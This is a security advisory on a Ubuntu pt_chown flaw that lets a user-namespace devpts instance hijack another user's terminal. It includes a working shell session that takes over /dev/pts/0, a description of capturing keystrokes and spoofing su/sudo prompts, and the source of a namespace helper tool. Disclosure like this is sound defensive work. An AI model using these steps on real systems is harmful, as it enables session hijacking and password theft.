
Source: http://www.halfdog.net/Security/2015/PtChownArbitraryPtsAccessViaUserNamespace/
|
|
|
|
## Introduction
|
|
|
|
Problem description: With Ubuntu Wily and earlier, /usr/lib/pt_chown was used to change ownership of slave pts devices in /dev/pts to the same uid holding the master file descriptor for the slave. This is done using the pt_chown SUID binary, which invokes the ptsname function on the master-fd, thus again performing a TIOCGPTN ioctl to get the slave pts number. Using the result from the ioctl, the pathname of the slave pts is constructed and chown invoked on it, see login/programs/pt_chown.c:
|
|
|
|
pty = ptsname (PTY_FILENO);
|
|
if (pty == NULL)
|
|
...
|
|
/* Get the group ID of the special `tty' group. */
|
|
p = getgrnam (TTY_GROUP);
|
|
gid = p ? p->gr_gid : getgid ();
|
|
|
|
/* Set the owner to the real user ID, and the group to that special
|
|
group ID. */
|
|
if (chown (pty, getuid (), gid) < 0)
|
|
return FAIL_EACCES;
|
|
|
|
/* Set the permission mode to readable and writable by the owner,
|
|
and writable by the group. */
|
|
if ((st.st_mode & ACCESSPERMS) != (S_IRUSR|S_IWUSR|S_IWGRP)
|
|
&& chmod (pty, S_IRUSR|S_IWUSR|S_IWGRP) < 0)
|
|
return FAIL_EACCES;
|
|
|
|
return 0;
|
|
|
|
The logic above is severely flawed when there can be more than one master/slave pair having the same number and thus the same name. This condition can easily be created by creating a user namespace, mounting devpts with the newinstance option, and creating master and slave pts pairs until the number overlaps with a target pts outside the namespace on the host whose ownership one wants to gain, and then invoking pt_chown.
|
|
|
|
## Methods
|
|
|
|
Exploitation is trivial: first use any user-namespace demo program to create the namespace needed, e.g. UserNamespaceExec.c (http://www.halfdog.net/Misc/Utils/UserNamespaceExec.c), and then work with standard shell commands, e.g. to take over /dev/pts/0:
|
|
|
|
test# who am I
|
|
test pts/1 2015-12-27 12:00
|
|
test# ./UserNamespacesExec -- /bin/bash
|
|
Setting uid map in /proc/5783/uid_map
|
|
Setting gid map in /proc/5783/gid_map
|
|
euid: 0, egid: 0
|
|
euid: 0, egid: 0
|
|
root# mkdir mnt
|
|
root# mount -t devpts -o newinstance /dev/pts mnt
|
|
root# cd mnt
|
|
root# chmod 0666 ptmx
|
|
|
|
Use a second shell to continue:
|
|
|
|
test# cd /proc/5783/cwd
|
|
test# ls -al
|
|
total 4
|
|
drwxr-xr-x 2 root root 0 Dec 27 12:48 .
|
|
drwxr-xr-x 7 test users 4096 Dec 27 11:57 ..
|
|
c--------- 1 test users 5, 2 Dec 27 12:48 ptmx
|
|
test# exec 3<>ptmx
|
|
test# ls -al
|
|
total 4
|
|
drwxr-xr-x 2 root root 0 Dec 27 12:48 .
|
|
drwxr-xr-x 7 test users 4096 Dec 27 11:57 ..
|
|
crw------- 1 test users 136, 0 Dec 27 12:53 0
|
|
crw-rw-rw- 1 test users 5, 2 Dec 27 12:48 ptmx
|
|
test# ls -al /dev/pts/0
|
|
crw--w---- 1 root tty 136, 1 Dec 27 2015 /dev/pts/0
|
|
test# /usr/lib/pt_chown
|
|
test# ls -al /dev/pts/0
|
|
crw--w---- 1 test tty 136, 1 Dec 27 12:50 /dev/pts/0
|
|
|
|
On systems where the TIOCSTI ioctl is not prohibited, the tools from TtyPushbackPrivilegeEscalation (http://www.halfdog.net/Security/2012/TtyPushbackPrivilegeEscalation/) can be used to directly inject code into a shell using the pts device. This is not the case at least on Ubuntu Wily. But as reading from and writing to the pts is allowed, the malicious user can now intercept all keystrokes and display faked output from commands never really executed. Thus he could lure the user into a) changing his password or attempting to invoke su/sudo, or b) simulating a situation where the user's next step is predictable and risky, and then stop reading the pts, thus making the user execute a command in a completely unexpected way.
|
|
|
|
|
|
|
|
|
|
--- UserNamespaceExec.c ---
|
|
/** This software is provided by the copyright owner "as is" and any
|
|
* expressed or implied warranties, including, but not limited to,
|
|
* the implied warranties of merchantability and fitness for a particular
|
|
* purpose are disclaimed. In no event shall the copyright owner be
|
|
* liable for any direct, indirect, incidential, special, exemplary or
|
|
* consequential damages, including, but not limited to, procurement
|
|
* of substitute goods or services, loss of use, data or profits or
|
|
* business interruption, however caused and on any theory of liability,
|
|
* whether in contract, strict liability, or tort, including negligence
|
|
* or otherwise, arising in any way out of the use of this software,
|
|
* even if advised of the possibility of such damage.
|
|
*
|
|
* Copyright (c) 2015-2016 halfdog <me (%) halfdog.net>
|
|
* See http://www.halfdog.net/Misc/Utils/ for more information.
|
|
*
|
|
* This tool creates a new namespace, initializes the uid/gid
|
|
* map and executes the program given as argument. This is similar
|
|
* to unshare(1) from newer util-linux packages.
|
|
*
|
|
* gcc -o UserNamespaceExec UserNamespaceExec.c
|
|
*
|
|
* Usage: UserNamespaceExec [options] -- [program] [args]
|
|
*
|
|
* * --NoSetGroups: do not disable group changes
|
|
* * --NoSetGidMap: do not write the gid map of the child
|
|
* * --NoSetUidMap: do not write the uid map of the child
|
|
*/
|
|
|
|
|
|
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>
|
|
|
|
extern char **environ;
|
|
|
|
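/*
 * Entry point of the clone()d child (see the clone() call in main()).
 *
 * arg is the NULL-terminated argv-style vector (char **) of the program
 * to run; arg[0] is the path handed to execve().
 *
 * The parent writes /proc/<pid>/uid_map only after clone() has returned,
 * so the child first waits until that mapping is visible (its effective
 * uid becomes 0) or until the parent has gone away (getppid() changes).
 * It reports the effective ids before and after the wait, then replaces
 * itself with the program.
 *
 * Returns 1 only when execve() fails; on success it does not return.
 */
static int childFunc(void *arg) {
  char **childArgv = (char **)arg;
  int parentPid = getppid();

  /* uid_t/gid_t are unsigned; cast so the format matches the argument. */
  fprintf(stderr, "euid: %d, egid: %d\n", (int)geteuid(), (int)getegid());

  /* Poll for the uid mapping; the getppid() test stops the loop if the
   * parent died (we were reparented), otherwise it would spin forever.
   * NOTE(review): with --NoSetUidMap the euid never becomes 0 while the
   * parent lives, and the parent blocks in waitpid() on this child, so
   * the two presumably wait on each other until one is killed — confirm. */
  while (geteuid() != 0 && parentPid == getppid()) {
    sleep(1);
  }
  fprintf(stderr, "euid: %d, egid: %d\n", (int)geteuid(), (int)getegid());

  /* execve() returns only on failure, so its result is not stored. */
  execve(childArgv[0], childArgv, environ);
  fprintf(stderr, "Exec failed\n");
  return 1;
}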
|
|
|
|
|
|
/* Size of the stack the clone()d child runs on. */
#define STACK_SIZE (1024 * 1024)
/* Stack for the child. clone() in main() is handed child_stack+STACK_SIZE,
 * the top of this array, which is what clone(2) expects on architectures
 * whose stack grows downwards. */
static char child_stack[STACK_SIZE];
|
|
|
|
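/*
 * Writes data to /proc/<pid>/<name> in a single write(2).
 *
 * The id-map files accept the whole map in one write only, so a short
 * write is treated as a failure.
 *
 * Returns 0 on success, -1 if the path did not fit or the file could not
 * be opened, -2 if the write failed or was short. errno describes the
 * failing call (close() cannot clobber it).
 */
static int writeProcFile(pid_t pid, const char *name, const char *data) {
  char path[128];
  int n = snprintf(path, sizeof path, "/proc/%d/%s", (int)pid, name);
  if (n < 0 || (size_t)n >= sizeof path) {
    errno = ENAMETOOLONG;
    return -1;
  }
  int fd = open(path, O_WRONLY);
  if (fd < 0) {
    return -1;
  }
  size_t len = strlen(data);
  ssize_t written = write(fd, data, len);
  int savedErrno = errno;
  close(fd);
  if (written < 0) {
    errno = savedErrno;
    return -2;
  }
  if ((size_t)written != len) {
    errno = EIO;
    return -2;
  }
  return 0;
}

/*
 * Stops a child whose namespace setup failed and reaps it. Without this
 * the child would notice the parent's exit and exec the program with the
 * id mappings incomplete.
 */
static void abandonChild(pid_t pid) {
  kill(pid, SIGKILL);
  waitpid(pid, NULL, 0);
}

/*
 * Usage: UserNamespaceExec [options] -- [program] [args]
 *
 * Parses the options, clones a child into new user, IPC, network and
 * mount namespaces, writes the child's setgroups, uid_map and gid_map
 * files so that the caller's uid/gid appear as 0/0 inside, and waits for
 * the child, which execs the program once the uid mapping is visible.
 *
 * Options: --NoSetGroups (leave setgroups alone), --NoSetUidMap and
 * --NoSetGidMap (skip the respective map).
 *
 * Returns 0 once the child has been waited for, 1 on any setup error.
 * The child's own exit status is not propagated.
 */
int main(int argc, char *argv[]) {
  int argPos;
  int noSetGroupsFlag = 0;
  int setGidMapFlag = 1;
  int setUidMapFlag = 1;

  /* Options run until "--" (consumed) or the first argument not starting
   * with "--" (left in place as the program to run). */
  for (argPos = 1; argPos < argc; argPos++) {
    const char *argName = argv[argPos];
    if (!strcmp(argName, "--")) {
      argPos++;
      break;
    }
    if (strncmp(argName, "--", 2)) {
      break;
    }
    if (!strcmp(argName, "--NoSetGidMap")) {
      setGidMapFlag = 0;
    } else if (!strcmp(argName, "--NoSetGroups")) {
      noSetGroupsFlag = 1;
    } else if (!strcmp(argName, "--NoSetUidMap")) {
      setUidMapFlag = 0;
    } else {
      fprintf(stderr, "%s: unknown argument %s\n", argv[0], argName);
      exit(1);
    }
  }

  /* Without a program argv+argPos is an empty vector: the child would only
   * fail inside execve() after the namespaces were already set up, and the
   * parent would still exit 0. Fail early instead. */
  if (argPos >= argc) {
    fprintf(stderr, "%s: no program given\n", argv[0]);
    fprintf(stderr, "Usage: %s [options] -- [program] [args]\n", argv[0]);
    return 1;
  }

  /* The child starts in childFunc() with new user, IPC, network and mount
   * namespaces; SIGCHLD makes it waitable with waitpid() below.
   * child_stack+STACK_SIZE is the top of the stack array, as clone() expects. */
  pid_t pid = clone(childFunc, child_stack + STACK_SIZE,
                    CLONE_NEWUSER | CLONE_NEWIPC | CLONE_NEWNET | CLONE_NEWNS | SIGCHLD,
                    argv + argPos);
  if (pid == -1) {
    fprintf(stderr, "Clone failed: %d (%s)\n", errno, strerror(errno));
    return 1;
  }

  char idMapData[128];
  int rc;

  if (!noSetGroupsFlag) {
    /* An unprivileged process may write gid_map only after setgroups has
     * been set to "deny"; skipping this (--NoSetGroups) is expected to make
     * the gid_map write below fail. */
    rc = writeProcFile(pid, "setgroups", "deny");
    if (rc == -1) {
      fprintf(stderr, "Failed to open setgroups\n");
      abandonChild(pid);
      return 1;
    }
    if (rc != 0) {
      fprintf(stderr, "Failed to disable setgroups\n");
      abandonChild(pid);
      return 1;
    }
  }

  if (setUidMapFlag) {
    fprintf(stderr, "Setting uid map in /proc/%d/uid_map\n", (int)pid);
    /* Map exactly one id: uid 0 inside the namespace is the caller's uid. */
    snprintf(idMapData, sizeof idMapData, "0 %u 1\n", (unsigned)getuid());
    rc = writeProcFile(pid, "uid_map", idMapData);
    if (rc == -1) {
      fprintf(stderr, "Failed to open uid map\n");
      abandonChild(pid);
      return 1;
    }
    if (rc != 0) {
      fprintf(stderr, "UID map write failed: %d (%s)\n", errno, strerror(errno));
      abandonChild(pid);
      return 1;
    }
  }

  if (setGidMapFlag) {
    fprintf(stderr, "Setting gid map in /proc/%d/gid_map\n", (int)pid);
    snprintf(idMapData, sizeof idMapData, "0 %u 1\n", (unsigned)getgid());
    rc = writeProcFile(pid, "gid_map", idMapData);
    if (rc == -1) {
      fprintf(stderr, "Failed to open gid map\n");
      abandonChild(pid);
      return 1;
    }
    if (rc != 0) {
      if (noSetGroupsFlag) {
        /* Not fatal: the kernel refuses gid_map while setgroups is allowed. */
        fprintf(stderr, "Expected failed GID map write due to enabled group set flag: %d (%s)\n", errno, strerror(errno));
      } else {
        fprintf(stderr, "GID map write failed: %d (%s)\n", errno, strerror(errno));
        abandonChild(pid);
        return 1;
      }
    }
  }

  if (waitpid(pid, NULL, 0) == -1) {
    fprintf(stderr, "Wait failed\n");
    return 1;
  }
  return 0;
}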
|
|
--- EOF --- |